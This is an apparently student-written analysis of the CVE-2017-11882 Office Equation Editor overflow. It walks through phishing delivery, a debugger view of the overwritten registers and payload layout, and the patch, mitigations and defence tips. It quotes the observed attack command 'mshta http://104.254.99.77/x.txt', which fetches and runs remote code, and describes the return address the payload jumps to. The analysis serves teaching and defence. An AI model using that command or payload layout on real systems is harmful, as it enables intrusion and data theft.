tingsama/hacking-p2

Microsoft Office Memory Corruption (CVE-2017-11882)

Background

  • Age: 17-year-old vulnerability
  • What is it: Run arbitrary code remotely without user interaction
  • Why it works: Buffer overflow vulnerability inside the Equation Editor (EQNEDT32.EXE)
  • Who has been affected: Users who installed
    • Microsoft Office 2007 Service Pack 3
    • Microsoft Office 2010 Service Pack 2
    • Microsoft Office 2013 Service Pack 1
    • Microsoft Office 2016
  • CVSS:
    • The Common Vulnerability Scoring System
    • The score is 7.8 (high)
    • Really dangerous & should be fixed ASAP

Figure 1: CVSS score [1]

It always starts with phishing over the internet...

  1. A spam email
  2. An attachment
  3. A .doc file in Rich Text Format (RTF)
  4. Microsoft Office opens it automatically

Figure 2: Spam Email [2]

Process Monitor

It is an advanced monitoring tool for Windows.
It monitors and displays all file-system activity in real time.

  • An unexpected operation named 'EQNEDT32.EXE'
  • A command line has been invoked
  • (Very likely) a malicious host: 'mshta http://104.254.99.77/x.txt'

Figure 3: Processes List [3]

Burp Suite

It is a web vulnerability scanner.
It is a set of tools used for penetration testing of web applications; here it is used to capture the request the victim machine sends.

Figure 4: Get request [3]

Steps after you click the malicious Word file:

1. Microsoft Word loads the file

Here Microsoft Word loads the document and reads and parses its contents.

2. Execute Equation Editor

Everyone has used the Equation Editor before, to create nice-looking equations.
However, the Equation Editor is a separate program, and Microsoft Word launches it in its own process.
Because of this, everything inside the Equation Editor runs outside the protection mechanisms Microsoft applies to Word itself.

3. The hacker overflows the font name registers inside the Equation Editor

Before the overflow, EAX holds the length of the font name, which is 16 bytes (hex: 00000010).
The content of the font name registers is "TIMES NEW ROMAN".

Figure 5: Debugger screenshot 1 [3]

After the overflow, EAX points to 0012F350 and all the other registers have been overwritten. At address 004115CF the instruction loads whatever is in the EBP register and pushes it into EAX. The EBP register is a two-way pointer linking the Word document and the Equation Editor. The hacker changed the EBP register value to 48 bytes, which was then loaded into EAX.

Figure 6: Debugger screenshot 2 [3]

4. Overflow message

Let's now take a look at the 48 bytes inside the overflowed register, beginning at address 0012F350.
From address 0012F350 to 0012F360, 32 bytes hold the hacker's mshta link; the victim machine sends a GET request to this link and downloads the malicious software.
At address 0012F370, the first 12 bytes are '20'; they hold shellcode, but we cannot see it in detail through the ASCII view.
The final 4 bytes are '12 0C 43 00', which is the new EIP address the hacker wants us to jump to in the next step.

Figure 7: Debugger screenshot 3 [3]

5. Redirect to the new EIP address

Here we can see that at address 00430C12 it calls the WinExec function.

Figure 8: Debugger screenshot 4 [3]

6. WinExec executes

From the code here we can see that WinExec is called at address 00430C12 and takes the EAX register as its input.
In this case, WinExec runs the shellcode first, then sends a GET request to the hacker's link.

Figure 9: Debugger screenshot 5 [3]

7. Download the hacker's malicious software

Finally, after everything executes and runs correctly, it downloads the malicious software and hides it in a hard-to-find place, from where it continuously steals your personal information.

The best way to protect your machine from this vulnerability is patching. However, if you decide not to patch, a simple way to protect your machine is to disable EQNEDT32.EXE, the Equation Editor that contains the vulnerability. The following commands update your registry to disable EQNEDT32.EXE. If you have Office running on an x64 machine, use the second command; otherwise the first command is the one for you. [4]

Figure 10: Update registry [4]

The official patch for CVE-2017-11882 was released in the Patch Tuesday update of November 2017. The patching was mainly done in function sub_0041160F. The difference between the patched function (left-hand side) and the original function (right-hand side) is shown below. The top-left block shows that a bounds check was added: this code resets the counter register to 0x20 if it is greater than or equal to 0x21. The bottom-left block adds a buffer truncation: this code makes sure that only 0x20 bytes are copied and that the result is zero-terminated. [5]

Figure 11: Official Patch [5]
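The following is an added example (not code from this repository or from the patched binary) that mirrors the two fixes described above in plain C: the length is clamped to 0x20 when it is greater than or equal to 0x21, at most 0x20 bytes are copied, and the result is zero-terminated. The function name, the destination size and the 48-byte sample name are assumptions for illustration; the constants 0x20 and 0x21 come from the patch description.

```c
#include <stdio.h>
#include <string.h>

/* Constants from the patch description of sub_0041160F:
 * the counter is reset to 0x20 when it is >= 0x21, and only 0x20 bytes
 * are copied before the string is zero-terminated. */
#define FONT_NAME_MAX 0x20
#define FONT_NAME_DST (FONT_NAME_MAX + 1) /* assumed: room for the NUL */

/* Hypothetical C equivalent of the patched copy.  The unpatched code copied
 * the whole font name with no upper bound, which is what allowed the
 * 48-byte name in the write-up to overwrite the saved EIP.
 * Returns the number of bytes copied, excluding the terminating NUL. */
size_t patched_font_name_copy(char dst[FONT_NAME_DST], const char *src, size_t len)
{
    if (len >= 0x21)          /* added bounds check (top-left block)      */
        len = FONT_NAME_MAX;  /* counter reset to 0x20                    */
    memcpy(dst, src, len);    /* truncated copy of at most 0x20 bytes     */
    dst[len] = '\0';          /* explicit zero-termination (bottom block) */
    return len;
}

int main(void)
{
    char dst[FONT_NAME_DST];

    /* The benign case from the debugger walkthrough: a 15-character name. */
    const char *benign = "TIMES NEW ROMAN";
    size_t n = patched_font_name_copy(dst, benign, strlen(benign));
    printf("%zu bytes copied: \"%s\"\n", n, dst);

    /* A constructed 48-byte font name, the length quoted in the write-up.
     * With the patch it is cut to 0x20 bytes and never reaches the
     * saved return address. */
    char oversized[48];
    memset(oversized, 'A', sizeof oversized);
    n = patched_font_name_copy(dst, oversized, sizeof oversized);
    printf("%zu bytes copied (input was %zu), NUL at dst[%zu]: %s\n",
           n, sizeof oversized, n, dst[n] == '\0' ? "yes" : "no");
    return 0;
}
```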

How to avoid it?

  • Don't skip patches.
    Simply patching or updating the software can prevent an attack from happening.
  • Use real-time anti-virus.
    Using anti-virus software can sometimes be helpful.
  • Filter your email.
    Block the document types that you don't use.
    Do not click on a link or a document that looks suspicious.
  • Keep track of your websites. Don't enable online services or create online accounts just because of a promotion.

References:

[1] "NVD - CVE-2017-11882", Nvd.nist.gov, 2021. [Online]. Available: https://nvd.nist.gov/vuln/detail/CVE-2017-11882. [Accessed: 18 Mar 2021].
[2] Blogs.quickheal.com, 2021. [Online]. Available: https://blogs.quickheal.com/wp-content/uploads/2018/02/Fig3.png. [Accessed: 18 Mar 2021].
[3] C. Hardy, "Stack Buffer Overflows - a primer on smashing the stack using CVE-2017-11882", 2021.
[4] C. Hardy, "CVE-2017-11882 - 3 ways to perform technical analysis, 1 easy way to protect", 2021.
[5] L. Treiber, "Microsoft's Manual Binary Patch For CVE-2017-11882 Meets 0patch", Blog.0patch.com, 2021. [Online]. Available: https://blog.0patch.com/2017/11/official-patch-for-cve-2017-11882-meets.html. [Accessed: 18 Mar 2021].
